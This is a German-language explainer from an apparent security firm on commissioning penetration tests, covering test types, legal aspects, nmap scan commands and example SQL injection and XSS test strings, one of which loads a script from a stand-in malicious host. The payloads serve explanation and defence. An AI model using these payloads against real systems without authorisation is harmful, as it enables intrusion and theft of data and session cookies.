Was ist ein Penetrationstest? Definition, Abgrenzung, Beispiele!

Ein Penetrationstest ist ein organisierter, gezielter und genehmigter Angriffsversuch um in IT-Systeme einzudringen zum Ziel das IT-Sicherheitsniveau dieses Systems langfristig zu erhöhen. Dazu sind ausgebildete Experten notwendig. Auch während der Durchführung dürfen die Schutzziele der IT-Sicherheit (Verfügbarkeit, Vertraulichkeit und Integrität) nicht verletzt werden.

Explizite Belastungstests oder die Durchführung einer Untersuchung auf Testsystemen bilden die Ausnahme. Doch welche Ansätze und Herangehensweisen gibt es für die Durchführung eines Penetrationstests?

Wann sollte ich als Unternehmen darüber nachdenken einen Penetrationstest durchzuführen?

Für das eigene Interesse

Auf welchem Sicherheitsniveau befindet sich meine IT-Infrastruktur und meine Anwendungen? Wer auf diese Fragen keine Antwort kennt, weil diese Aspekte bisher nie untersucht worden sind, der kann eine professionelle Sicherheitsuntersuchung durchführen, um das eigene Sicherheitsniveau in Erfahrung zu bringen. Das Abhandenkommen von Kundendaten oder die Verschlüsselung von Systemen durch z.B. Ransomware ist ein geschäftsbedrohendes Risiko und sollte daher vermieden bzw. minimiert werden. Die Präsentation der Ergebnisse der Untersuchung kann dabei in unterschiedlichen Formen dargestellt werden:

  • Excel Liste mit Sicherheitslücken und Findings
  • Management Summary in der das Sicherheitsniveau zusammengefasst ist
  • Pentest Report inkl. Dokumentation und Handlungsempfehlungen

Das Ergebnis der Untersuchung kann so genutzt werden um die eigenen Anforderungen zu erfüllen.

„Verlasse dich auf andere und du bist verlassen..“

Einen externen IT-Dienstleister zu beschäftigen ist gerade für Unternehmen, die nicht in der Informations- und Kommunikationstechnik tätig sind, der Standard. Sich auf das zu konzentrieren, was man gut kann, wird einem schließlich oft empfohlen. Das trifft jedoch auch auf den IT-Dienstleister zu. IT-Sicherheit und der damit einhergehende Schutz von Geschäftswerten sowie dem ein- und ausgehenden Datenverkehrs ist für IT-Sicherheitsfirmen ein tagesfüllendes Geschäft.

Falls Sie einen einzelnen IT-Dienstleister damit beauftragt haben Ihre IT-Infrastruktur aufzubauen/zu warten, so sollten Sie in regelmäßigen Abständen eine professionelle IT-Sicherheitsuntersuchung durchführen. Auf der einen Seite dient der Penetrationstest der Feststellung von bestehenden Sicherheitslücken – auf der anderen Seite aber auch der Kontrolle des Dienstleisters. Dafür ist Fachpersonal nötig. Sogenannte White-Hat Hacker, Certified Ethical Hacker o.ä. Bezeichnungen und Zertifizierungen können ein erster Anhaltspunkt sein.

Aufgrund von regulatorischen und gesetzlichen Anforderungen

Neben eigenen Anforderungen können aber auch regulatorische Anforderungen eine Sicherheitsüberprüfung erfordern. In der Finanz- und Automobilindustrie ist dies bereits fester Bestandteil von regulatorischen Anforderungen beispielsweise durch die BaFin. Aber auch Gesetze zwingen Anbieter von Systemen zu einem Penetrationstest. So verpflichtet die DSGVO Verarbeiter von personenbezogenen Daten beispielsweise in Artikel 32 dazu, „Anforderungen für die Vertraulichkeit, Verfügbarkeit und Integrität zu schaffen und entsprechende Sicherstellung dieser Schutzziele. Auch das neue IT-Sicherheitsgesetz wird vermutlich weitere Verpflichtungen im Bereich der Penetrationstests schaffen. Hier bleibt jedoch noch der finale Entwurf abzuuwarten

Für eine Zertifizierung

Relevant wird die Durchführung von einem Penetrationstests besonders dann, wenn eine Zertifizierung angestrebt wird. Hierzu zählt indirekt auch die Forderung von Kunden und Lieferanten. Gerade bei der Einführung eines automatischen Datenaustausches wird in der Regel gefordert die entsprechenden Schnittstellen zu testen. Zahlreiche ISO Normen können dahingehend ausgelegt werden, dass die Untersuchung bzw. unabhängige Überprüfung angebracht, wenn nicht sogar notwendig ist.


Laden Sie jetzt unser kostenfreies Whitepaper herunter

Erfahren Sie mehr über die Mehrwerte und unsere Vorgehensweise bei der Durchführung einer professionellen IT-Sicherheitsuntersuchung.

 


Ein Penetrationstest kann aus unterschiedlichen Sichten durchgeführt werden

  • White-Box: Ein Angriff mit vollem Wissen und Zugriff auf Dokumentationen und Programmcode
  • Grey-Box: So viel wie nötig, so wenig wie möglich. Zeit und Kosten sparen für aussagekräftige Ergebnisse
  • Black-Box: Nichts ist bekannt und alle notwendigen Informationen für einen Angriff müssen selbst in Erfahrung gebracht werden

Je nach Anwendungsfall ist eine Sicht empfohlen oder gar vorgeschrieben. In manchen Anforderungskatalogen ist es jedoch offensichtlich welche Sicht notwendig ist. Gründe dafür könnten z.B. sein:

  • Code Reviews: Bei der Untersuchung des Quellcodes müssen die testenden Personen Zugriff auf den Quellcode erhalten. Diese Informationen fallen in den Bereich des White-Boxings.
  • Limitiertes Budget: Die Kosten für einen Pentest variieren stark. Auch der Kontext ist ausschlaggebend (Testinstanz, Live Umgebung). Falls das Budget im unteren vierstelligen Bereich limitiert ist, fällt die Wahl meistens auf die Durchführung eines Grey-Box Tests.
  • Nachbildung eines echten Angriffs: Wenn es weniger darum geht explizite Sicherheitslücken aufzudecken, sondern ein echter Angriff nachgebildet werden soll, dann ist der Black-Box Ansatz der richtige.

Tipp: Lassen Sie sich bei der Anforderung von Angeboten auch ein Beispiel Report aushändigen. Damit stellen Sie sicher, dass das Zieldokument mit Ihren Anforderungen übereinstimmt. Falls Aspekte in dem Beispiel nicht aufgelistet werden, klären Sie vor dem Test ab ob diese ein fester Bestandteil sind. So stellen Sie sicher, dass Zieldokument dem Zweck der Beauftragung dient.

Verschaffen Sie sich vor der Beauftragung einen Eindruck über das Zieldokument der Untersuchung.
Verschaffen Sie sich vor der Beauftragung einen Eindruck über das Zieldokument der Untersuchung. So kann Klarheit zwischen Auftraggeber und Auftragnehmer bei der Beauftragung zur Durchführung eines Pentests geschaffen werden.

Die unterschiedlichen Varianten im Detail

Der White-Box Pentest

Auf alle Dokumente und den Quellcode zugreifen – das zeichnet die Durchführung eines White-Box Pentests aus. Die Angreifer können sich bei Fragen an Entwickler und andere Beteiligte wenden. Es kann im Rahmen der Analyse darum gehen die Code-Qualität zu steigern und das Sicherheitsniveau sicherzustellen. Die Aushändigung von Plänen, der Netzinfrastruktur oder der Anwendungsarchitektur können von den Pentestern gefordert werden.

Die Informationsrecherche selber ist bloß ein kleiner Teil der Untersuchung. Da alle Informationen bereitgestellt werden, entfällt dieser Teil. Die Analyse von Quellcode ist jedoch zeitaufwändig und sorgt schlussendlich dafür, dass der Aufwand ähnlich hoch ist wie der bei der Durchführung eines Black-Box Tests. Wer folgender Aussage zustimmen, für den ist der White-Box Pentest die richtige Wahl:

Ich will interne Strukturen wie z.B. die Code-Qualität steigern und potenzielle Sicherheitsmängel- und Lücken aufspüren und schließen

Der Black-Box Pentest

Bei der Durchführung von einem Black-Box Pentest werden keinerlei Information mitgeteilt. Falls der Test auf eine Anwendung oder einen Bereich der Infrastruktur begrenzt wird, so sollte zumindest die Domain oder IP-Adresse kommuniziert werden. So lässt sich eine hohe realitätstreue bei der Durchführung eines potenziellen Angriffes darstellen. Wer einen Black-Box Pentest durchführen will, der sollte mit einer erhöhten Anzahl an Personentagen rechnen.

Die Informationsrecherche, Kategorisierung und Entdeckung von Systemen und Landschaften kostet Zeit. Es kann aber genau das sein, was man sucht. Ein Black-Box Pentest ist dann die richtige Wahl, wenn Sie folgender Aussage zustimmen:

Ich will wissen wie wahrscheinlich es ist, dass ein unabhängiger Angreifer meine Systeme erfolgreich angreift.

Der Grey-Box Pentest

Wer einen Grey-Box Pentest durchführen will, der geht den Mittelweg zwischen Black- und White-Box Pentest. Dabei werden die notwendigen Informationen für die Durchführung von Angriffen mitgeteilt. Die Pentester haben jedoch keine Möglichkeit auf interne Ressourcen zuzugreifen. Die Durchführung des Tests beansprucht weniger Zeit und ist deshalb die effizienteste Wahl. Der Großteil der durchgeführten Untersuchungen wird aus der Grey-Box Sicht ausgeführt.

Für Sie ist die Durchführung des Mittelweges die richtige Wahl, wenn Sie bei der Suche nach einem Pentest-Anbieter die folgende Aussage bestätigen:

Das Projektbudget ist begrenzt und das Ergebnis soll das Aufdecken von Schwachstellen einer Anwendung oder der Infrastruktur sein.

Zusammenfassung der Pentest Varianten

Sicht/AufwandInformationsrechercheKommunikationAufwandKosten
White-BoxGering
Informationsmaterial wird gestellt. Auf Fragen wird von verantwortlichem Personal geantwortet.
Intensiv
Eine enge Kommunikation zwischen Pentester:innen.
Hoch
Die Analyse von Quellcode ist zeitaufwendig und beansprucht viele Personentage.
Hoch
Durch die intensive Kommunikation und Analyse werden interne und externe Ressourcen benötigt.
Grey-BoxMittel
das nötigste Informationsmaterial wird gestellt. Weitere Informationen müssen manuell in Erfahrung gebracht werden.
Gering
Nur bei Notfällen oder unvorhergesehenen Ereignissen wird Kontakt zum Auftraggeber aufgenommen
Mittel
Das ausgewogene Verhältnis zwischen Testaufwand und Informationsrecherche macht den Grey-Box Test zur effizientesten Sicht
Mittel
Der Informationsgewinn aus der Untersuchung dient der Entdeckung und Schließung von bestehenden Sicherheitslücken.
Black-BoxHoch
Alle notwendigen Informationen für die Planung und Durchführung von Attacken müssen vom Pentest-Team in Erfahrun gebracht werden.
Sehr gering
Lediglich die Domain bzw. der IP-Adressraum wird kommuniziert. Während des Tests nur in Notfällen.
Sehr hoch
Alle Schritte von der Planung bis zu Durchführung der Untersuchung müssen vom Pentest-Team in vollem Umfang, ohne Unterstützung, durchgeführt werden.
Hoch
Durch die notwendige Informationsrecherche und fehlende Unterstützung des Auftraggebers wird eine hohe Anzahl an Personentagen nötig. Somit steigen die Kosten.

Berücksichtigung rechtlicher Aspekte bei der Durchführung eines Penetrationstests

Wer einen Penetrationstest beauftragt, der sollte sich darüber bewusst sein dass es sich um einen beauftragten Angriff auf die eigenen Systeme handelt. Grundsätzlich lassen sich Maßnahmen treffen um diese Angriffe während des Tests als solche zu erkennen. Wir empfehlen grundsätzlich nur einen Pentest bei einem Anbieter zu beauftragen, der über eine statische IP-Adresse verfügt. Erst dann ist auch  das zuverlässige Whitelisting möglich.

Aber auch rechtlich sollten sich Auftragnehmer und Auftraggeber absichern. Der sogenannte „Hackerparagraph“ ist seit dem 11.08.2007 in Kraft und soll zur Bekämpfung von Computerkriminalität beitragen – steht aber der Durchführung einer IT-Sicherheitsuntersuchung entgegen. Folgende Aspekte sind schließlich Bestandteil einer professionellen Untersuchung

  • § 202 a StGB – Ausspähen von Daten
    Wer unbefugt sich oder einem anderen Zugang zu Daten, die nicht für ihn bestimmt und die gegen unberechtigten Zugang gesichert sind, unter Überwindung der Zugangssicherung verschafft, wird mit Freiheitsstrafe bis zu 3 Jahren oder Geldstrafe bestraft.
  • § 202 b StGB – Abfangen von Daten
    Wer unbefugt sich oder einem anderen unter Anwendung von technischen Mitteln nicht für ihn bestimmte Daten (§ 2020 a Abs. 2) aus einer nicht öffentlichen Datenübermittlung oder aus der elektromagnetischen Abstrahlung einer Datenverarbeitungslage verschafft, wird mit Freiheitsstrafe bis zu 2 Jahren oder mit Geldstrafe bestraft, wenn die Tat nicht in anderen Vorschriften mit schwerer Strafe bedroht ist
  • § 202 c StGB – Vorbereiten des Ausspähens und Abfangens von Daten
    (1) Wer eine Straft nach § 202 a oder 202 b vorbereitet, indem er

    1. Passwörter oder sonstige Sicherungscodes, die den Zugang zu Daten (§ 202 a Abs. 2) ermöglichen oder
    2. Computerprogramme, deren Zweck die Begehung einer solchen Tat ist, ..

weitere Details lassen sich direkt im Internet nachlesen.

Wichtig für die Durchführung eines Penetrationstests ist deshalb die Genehmigungsvereinbarung. Dieses Dokument wird nach der Unterzeichnung der Geheimhaltungsvereinbarung (non-disclosure agreement abk. NDA) und der Annahme des Angebots verhandelt, ausgetauscht und unterzeichnet. Ein Bestandteil ist die explizite Erlaubnis die vereinbarten Systeme anzugreifen.

Enthalten ist auch der Hinweis, dass der Ausfall bzw. die Nichtverfügbarkeit von Systemen nicht gewährleistet werden kann. Es gibt aber schließlich auch Ausnahmen von dieser Regel: Falls ein Pentest auf einem Live System durchgeführt wird, sollte auf diesen Punkt seitens Auftraggeber- und nehmer geachtet werden. Die Anzahl der Personentage kann bei der Untersuchung eines Live Systems jedoch steigen.

Idealerweise wird der Pentest jedoch auf einem Testsystem durchgeführt. Dies ermöglicht ein schnelleres Testen und reduziert bzw. beseitigt das Risiko der Nichtverfügbarkeit von Systemen. Bevor die Entwicklung also abgeschlossen ist und die Testsysteme heruntergefahren werden, sollte der Pentest beauftragt und durchgeführt werden. Die Aggressivität bei der Durchführung der Untersuchung kann wie folgt unterschieden werden:

AggressivitätBeschreibung
PassivDie gefunden Schwachstellen werden nicht ausgenutzt. Die Angreifer selber sind zusätzlich schwer zu detektieren, da Werkzeuge benutzt werden die kaum bis gar keine Spuren hinterlassen.
VorsichtigEine gefundene Schwachstelle wird nur dann ausgenutzt wenn die Beeinträchtigung des Systems nahezu ausgeschlossen werden kann. Die Schutzziele der IT-Sicherheit (Integrität, Verfügbarkeit und Vertraulichkeit) sollen gewahrt bleiben.
AbwägendGefundene Schwachstellen werden gezielt und nach Rücksprache ausgenutzt. Eine Systembeeinträchtigung kann hervorgerufen werden. Dieser Test sollte ausschließlich auf Testsystemen durchgeführt werden.
AggressivDas Risiko die Schutzziele der IT-Sicherheit zu verletzen wird ignoriert. Alle gefundenen Schwachstellen werden ausgenutzt. Eine vollständige Kompromittierung des Systems ist das Ziel. Ausschließlich auf isolierten Testsystemen zu empfehlen.

Der Unterschied zwischen Schwachstellenanalyse, Vulnerability Scan und Penetrationstest

Unter dem Begriff Schwachstellenanalyse lassen sich alle Maßnahmen, Projekte und Vorhaben bezeichnen, die dazu dienen Lücken im System aufzudecken. Das kann sich auf menschliche oder technische Aspekte beziehen. Aber auch Prozesse können das Ziel einer Schwachstellenanalyse sein.

Vulnerability Scan

Das automatische Testen von bekannten Schwachstellen gelingt mit der Hilfe zahlreicher Werkzeuge. Bei einem Vulnerability bzw. Security Scan wird der Großteil der Untersuchung automatisiert. Es geht darum einen ersten Eindruck von der Anwendung oder Infrastruktur zu erhalten.

Eine Überprüfung einzelner Findings findet nur Stichprobenartig statt. Ein Scan dieser Art ist kostengünstiger als die Durchführung eines vollständigen Penetrationstests.

Penetrationstest

Auch bei einem Penetrationstest wird auf automatisierte Werkzeuge geprüft. Im Gegensatz zum Vulnerability Scan werden die Ergebnisse manuell überprüft. Auch neuartige oder außergewöhnliche Bestandteile können zum Testumfang gehören. Die Dauer des Penetrationstests hängt stark von den Bedürfnissen des Kunden ab.

In der Regel startet ein einfacher Test mit zwei Personentagen. Es gibt jedoch Untersuchungen größerer Infrastrukturen die mit dreistelligen Personentagen durchgeführt worden sind. Ein Vulnerability Scan ist im Vergleich dazu erheblich schneller durchgeführt, liefert aber auch weniger belastbare Erkenntnisse.

Welche Werkzeuge kommen im Rahmen eines Pentests zum Einsatz?

Abhängig von dem Bereich in dem Informationen gesammelt, zugeordnet oder explizite Punkte der Infrastruktur oder Anwendung untersucht werden, kommen spezialisierte Werkzeuge zum Einsatz. Dieses Vorgehen hat sich in der IT-Security durchgesetzt, auch wenn manche Werkzeuge den Anspruch erheben alle Bereiche abzudecken.

Open Source Intelligence – öffentliche Informationen sammeln

Das Sammeln von Informationen im Internet kann sehr umfangreich sein. Längst nicht mehr wird diese Suche manuell getätigt. Mit der Hilfe zahlreicher Werkzeuge können Verbindungen schneller und zuverlässiger entdeckt werden. So können Kosten reduziert und die Informationsrecherche beschleunigt werden. Wir pflegen ein umfangreiches Verzeichnis an potenziellen Quellen für relevante Informationen auf Github. Folgende Werkzeuge kommen beispielhaft bei der automatisierten Recherche zum Einsatz:

WerkzeugBeschreibung
Recon-NGDieses Open Source Framework wird eingesetzt um Informationen von web-basierten Anwendungen zu erhalten. Ein schnelles und zuverlässiges Werkzeug.
MaltegoEin interaktives Data-mining Tool das mit der Hilfe von Graphen Verbindungen darstellt. Zusammenhänge können so einfach entdeckt werden.
theHarvesterVor allem die Entdeckung und Erkundung von E-Mail-Adressen, Subdomains, offenen Ports und Mitarbeiter:innen ist das Ziel dieser Software.

Ein weiteres sehr beliebtes Werkzeug ist dnsdumpster. Im folgenden Beispiel sind die DNS und MX Records von der Domain „internet-sicherheit.de“ zu sehen. Die Ergebnisse verraten also die IP-Adresse und geben Hinweise auf die dahinterstehende Infrastruktur.

Ergebnisse DNSDumpster Vorbereitung Pentest
Bei der Analyse der Domain „internet-sicherheit.de“ lässt sich erkennen welche Systeme und weiteren Domains mit dieser im Zusammenhang stehen.

Die Verwendung von Werkzeugen allein ersetzt weder einen Vulnerability Scan noch einen Pentest. Zusammenhänge müssen hergestellt werden und potenzielle Schwachstellen auch bei Bedarf tatsächlich ausgenutzt werden.

Mapping Technologien – Die Anwendung aus Nutzersicht verstehen

Das Ziel dieses Schrittes ist es die Technologien der Anwendung aus Nutzersicht zu entdecken. Dazu werden etablierte Werkzeuge wie z.B. nmap eingesetzt. Der freie Portscanner kann dafür genutzt werden Hosts in einem Rechnernetz zu identifizieren. Dies erschließt sich auch aus dem Namen: nmap steht für „Netzwork Mapper“. Folgende Befehle kommen beispielhaft bei der Durchführung von einem Pentest zur Anwendung:

  • Port Scan auf die Top 1000 TCP Ports
    nmap 192.168.100.2
  • Ping sweep 8 lokale addressen
    nmap -sP 192.168.100.0-7
  • Port Scan auf TCP Ports 80 & 443
    nmap -p 80,443 192.168.100.2
  • Port Scan auf die Top 1000 TCP Ports mit einem Fingerprint auf das Betriebssystem, Services und anschließender Durchführung nicht invasiver NSE Scripts
    sudo nmap -A 192.189.100.2
  • Port Scan auf alle 65.535 TCP Ports inkl. Fingerprinting und NSE Scripts
    sudo nmap -A -p- 192.168.100.2
  • Port Scan auf Top 1.000 UDP Ports
    sudo nmap -sU 192.168.100.2
  • Port Scan auf alle 65.535 UDP Ports
    sudo nmap -sU -p- 192.168.100.2
  • Port Scan auf alle 65.535 UDP Ports, inkl. Fingerprinting und starten von nicht invasiven  NSE Scripts
    sudo nmap -sU -p- -A 192.168.100.2

Hinweis: Ohne explizite Erlaubnis sollte selbst ein Portscan nicht auf fremder Infrastruktur durchgeführt werden. IT-Sicherheitsrichtlinien im Unternehmen können bereits das Portscanning als Angriff deuten und entsprechende Gegenmaßnahmen einleiten.

Beispiele für Angriffe – Prüfungselemente eines Penetrationstests!

Von der Standardsoftware bis hin zur Individualsoftware kann im Rahmen eines Penetrationstests alles untersucht werden. Die Vorgehensweise und Angriffe unterscheiden sich dadurch grundsätzlich. Kein Projekt ist gleich. Es gibt jedoch Angriffe, die sich aufgrund der Software-Architektur ähneln.

Angriffsbeispiel: SQL-Injection

So haben nach wie vor viele Anwendungen eine klassische SQL-Datenbank im Hintergrund. Wird dies dem Pentest-Team im Rahmen eines Grey– oder White-Box Tests mitgeteilt oder im Rahmen einer Black-Box Untersuchung in Erfahrung gebracht, so kann hier auf das Vorhandensein einer sog. SQL-Injection geprüft werden. Dies kann mit folgenden Beispielen geprüft werden:

' OR 1=1 -- 1

' OR 1'1='1

' or 1=1 LIMIT 1;--

admin';--

http://www.example.com/product.php=id10 AND 1=1

Mit diesen Beispielen, die z.B. im Login einer Webseite platziert werden, wird die Funktionsweise der Datenverarbeitung getestet. So sollte im Backend bzw. im Quellcode ausschließlich mit prepared Statements gearbeitet werden. Der Zugriff auf die Datenbanken durch das Suchfeld kann so zuverlässig verhindert werden.

Das Aufdecken einer SQL-Injection ist eine kritische Sicherheitslücke, da es für potenzielle Angreifer leicht ist die Lücke zu finden. Aber auch der potenzielle Schaden ist hoch. Die Datenbank kann manipuliert, gelöscht oder ausgelesen werden. Die Schutzziele der IT-Sicherheit (Verfügbarkeit, Integrität und Vertraulichkeit) werden so gebrochen.

Angriffsbeispiel: Cross-site Scripting (XSS)

Das Vorfinden einer Cross-site Scripting Sicherheitslücke ist ebenfalls ein kritisches Finding. Angreifer werden in die Lage versetzt JavaScript Code auf der Webseite auszuführen. Es werden drei unterschiedliche Arten dieser Attacke unterschieden:

  1. Stored
    Eine „Stored XSS“ Schwachstelle findet sich dann vor, wenn der vom Angreifer ausgeführte Code persistent in den Daten des Servers gespeichert und bei jedem Aufruf der Seite ausgeführt wird.
  2. Reflected
    Die „Reflected XSS“ Schwachstelle wird nich persistent auf dem Server gespeichert. Diese Schwachstelle wird durch eine Benutzereingabe provoziert. Anstatt eines Suchbegriffes wird versucht JavaScript Code zu platzieren und diesen zur Ausführung zu bringen
  3. DOM-Based
    Im Gegensatz zu den anderen Beispielen wird dieser Art der XSS Schwachstelle ohne die direkte Beteiligung des Servers ausgeführt. Beim Aufruf einer Webseite wird ein Skript mit ausgeliefert, welches vom Client ausgeführt wird.

Das Prüfen auf eine Cross-site Scripting Schwachstelle kann z.B. durch folgenden Befehl erfolgen

<IMG SRC=javascript:alert('XSS')>
"><script>alert('XSS')</script><"
" onmouseover="alert('XSS')

http://server/cgi-bin/testcgi.exe?<SCRIPT>alert(“Cookie”+document.cookie)</SCRIPT> %3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e


Laden Sie jetzt unser kostenfreies Whitepaper herunter

Erfahren Sie mehr über die Mehrwerte und unsere Vorgehensweise bei der Durchführung einer professionellen IT-Sicherheitsuntersuchung.

 


Erfolgreich einen Penetrationstest in Auftrag geben

Dieser Einblick soll Sie dabei unterstützen einen Penetrationstest in Auftrag zu geben der Ihre Anforderungen und Erwartungen erfüllt. Lassen Sie sich stets ausführlich von Ihrem Pentest Anbieter beraten. Kommunizieren Sie transparent, zu welchem Zweck Sie den Test durchführen. Die Durchführung einer professionellen IT-Sicherheitsuntersuchung sollte sich stets an gängigen Rahmenwerken orientieren – außer dies ist explizit nicht gewünscht.

Aspekte, die Sie vor der Angebotsanfrage wissen sollten

  1. Soll der Test als White-, Grey– oder Black Box Test ausgeführt werden?
  2. Wollen Sie eine Anwendung, Infrastruktur oder alles untersuchen lassen?
  3. Nach welchem Rahmenwerk wollen Sie den Pentest durchführen lassen?
  4. Soll ein Re-Test inbegriffen sein?
  5. Soll die Untersuchung nur während der Bürozeiten oder auch Abends oder Nachts stattfinden?
  6. Nennen Sie in der Angebotsanfrage einen Ansprechpartner (falls Informationen zur Angebotserstellung fehlen)
  7. Vermeiden Sie die Reduzierung oder Erweiterung des Testumfangs

So finden Sie einen professionellen Pentest Anbieter

  • Welche Rechtsform hat die Unternehmen? Schauen Sie hierzu in das Impressum
  • Lassen Sie sich bestätigen, dass das Pentest Unternehmen eine gültige Haftpflichtversicherung besitzt
  • Bestehen Sie darauf eine feste IP-Adresse mitgeteilt zu bekommen, von der aus getestet wird (Finden Sie heraus, ob die IP-Adresse zu dem Unternehmen gehört)
  • Lassen Sie sich die Qualifikation und Zertifizierungen der Projektbeteiligten darstellen
  • Anonymisierte oder öffentliche Referenzen zeigen Ihnen, dass das Unternehmen bereits in dem Feld tätig ist
  • Prüfen Sie darüber hinaus die Umsatzsteuer Identifikationsnummer auf Gültigkeit
    Wer das Pentesting im Neben- oder Kleingewerbe durchführt ist lediglich für sehr kleine Projekte geeignet.